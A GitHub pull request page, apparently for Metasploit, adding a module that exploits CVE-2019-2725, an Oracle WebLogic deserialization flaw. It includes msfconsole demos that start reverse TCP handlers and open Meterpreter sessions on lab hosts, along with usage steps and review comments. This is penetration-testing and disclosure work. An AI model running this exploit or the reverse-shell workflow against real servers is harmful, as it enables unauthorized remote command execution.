Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Weblogic deserialize AsyncResponseService module #11780

Merged

Conversation

Projects
None yet
7 participants
@acamro
Copy link
Contributor

commented Apr 26, 2019

Hello again,
I've been very busy lately, however, here you have another juicy contribution.
By the way, thank you so much for the acknowledgment in the articles (y)...

Please, add this exploit module for CVE-2019-2725, CNVD-C 2019-48814, Oracle Weblogic Deserialization Vulnerability in the WLS AsyncResponseService web service component.
It was tested on Windows 7 x64 and Ubuntu 14.04.4 x64 with Oracle Weblogic Server v10.3.6 and v12.1.3

More Info:
[1] https://medium.com/@knownseczoomeye/knownsec-404-team-oracle-weblogic-deserialization-rce-vulnerability-0day-alert-90dd9a79ae93
[2] https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html
[3] https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html

Please feel free to fix or add things!!!

TODO

Fix the Unix payload to make it more generic
Add more payloads
More tests on Linux
Tests on Solaris
Documentation

DEMO

 msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set uripath http://192.168.192.132
 uripath => http://192.168.192.132
 msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set wspath /_async/AsyncResponseService
 wspath => /_async/AsyncResponseService
 msf exploit(multi/misc/weblogic_deserialize_unicastref) > set rport 7001
 rport => 7001
 msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set lport 8888
 lport => 8888
 msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set lhost 192.168.192.129
 lhost => 192.168.192.129
 msf exploit(multi/misc/weblogic_deserialize_unicastref) > exploit
 [*] Started reverse TCP handler on 192.168.192.129:8888
 [*] Generating payload...
 [*] [/_async/AsyncResponseService] Sending payload...
 [*] Sending stage (179779 bytes) to 192.168.192.132
 [*] Meterpreter session 2 opened (192.168.192.129:8888 -> 192.168.192.132:53854) at 2019-04-25 16:49:49 -0700

 meterpreter > sysinfo
 Computer        : GIOTTO-HS-W7
 OS              : Windows 7 (Build 7600).
 Architecture    : x64
 System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/windows

Verification

  • Start msfconsole
  • use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
  • set uripath
  • set wspath
  • set rport
  • set lhost
  • set lport
  • exploit
  • sessions -i 1
  • Enjoy!!!

acamro added some commits Apr 26, 2019

Forgotten string interpolation..
Co-Authored-By: acamro <acamro@users.noreply.github.com>
@wvu-r7
Copy link
Contributor

left a comment

A few things to update or change. Thanks for the submission!

acamro added some commits May 1, 2019

acamro added some commits May 1, 2019

@wvu-r7

wvu-r7 approved these changes May 1, 2019

asoto-r7 added some commits May 6, 2019

weblogic_deserialize_asyncresponseservice: Added check method, improv…
…ed exception handling, minimizing XML strings
@asoto-r7

This comment has been minimized.

Copy link
Contributor

commented May 6, 2019

@acamro : Thanks again for the quick turnaround!

I compared your xml_encode method to your newer commit's shell_payload.encode(xml: :text) technique. There are definitely differences, the latter seems more efficient and just as reliable, so good change!

I went ahead and wrote docs, added a check method (from which I'd love feedback), and addressed some of @wvu-r7's stylistic comments. I also strengthened some exception handling based on my testing to deal with failed exploit attempts. Lastly, I removed some whitespace in the XML strings for maximum speed! 😃

I've tested this against Ubuntu and Win10 on WebLogic v10.3.6, as well as against a seemingly non-vulnerable WebLogic 12c (12.2.1.2). Throwing this against the latter doesn't seem to cause any adverse affects.

Getting ready to land this PR. 👍

@asoto-r7

This comment has been minimized.

Copy link
Contributor

commented May 6, 2019

Sanity testing failed because of a VM / infrastructure failure, not because of anything in the module:

testlog:[2019-05-06 20:27:24.574657] PROCESSING: Sanity_Win2016x64
testlog:[2019-05-06 20:27:24.574761] DID NOT FIND VM: Sanity_Win2016x64 ON 10.17.4.6
testlog:[2019-05-06 20:27:24.574833] RESETTING VM Sanity_APT_MSF_HOST
testlog:[2019-05-06 20:27:24.574893] NO TEMP SNAPSHOT FOUND FOR Sanity_APT_MSF_HOST
testlog:[2019-05-06 20:27:24.574958] RESETTING VM Sanity_Win2016x64
testlog:[2019-05-06 20:27:24.575014] NO TEMP SNAPSHOT FOUND FOR Sanity_Win2016x64
testlog:[2019-05-06 20:27:24.575067] THERE WAS A PROBLEM RESETTING VMS
testlog:[2019-05-06 20:27:24.575120] WAITING FOR ALL TASKS TO COMPLETE
testlog:[2019-05-06 20:27:29.580310] TEST FAILED

@asoto-r7 asoto-r7 merged commit aed8781 into rapid7:master May 6, 2019

1 of 3 checks passed

Metasploit Automation - Sanity Test Execution Failed to pass tests.
Details
continuous-integration/travis-ci/pr The Travis CI build is in progress
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
@asoto-r7

This comment has been minimized.

Copy link
Contributor

commented May 6, 2019

Release Notes

exploit/multi/misc/weblogic_deserialize_asyncresponseservice exploits an XML deserialization vulnerability (CVE-2019-2725 aka CNVD-C 2019-48814) in Oracle WebLogic via the AsyncResponseService component. The exploit provides an unauthenticated attacker with remote arbitrary command execution.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented May 7, 2019

Great work!!

@ccondon-r7

This comment has been minimized.

Copy link
Contributor

commented May 7, 2019

Agreed :) Thanks, all.

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented May 19, 2019

I was working on a bug for Oracle Application Testing Suite and I noticed this also works against its WebLogic service, except this is on port 8088 by default. Just wanted to share for whoever is attacking Oracle services:

msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > run

[*] Started reverse TCP handler on 172.16.135.1:4444 
[*] Generating payload...
[*] Powershell command length: 2309
[*] Sending payload...
[*] Sending stage (179779 bytes) to 172.16.135.128
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.128:49211) at 2019-05-19 00:30:29 -0500

meterpreter > 
@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented May 19, 2019

Don't forget to sleep!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.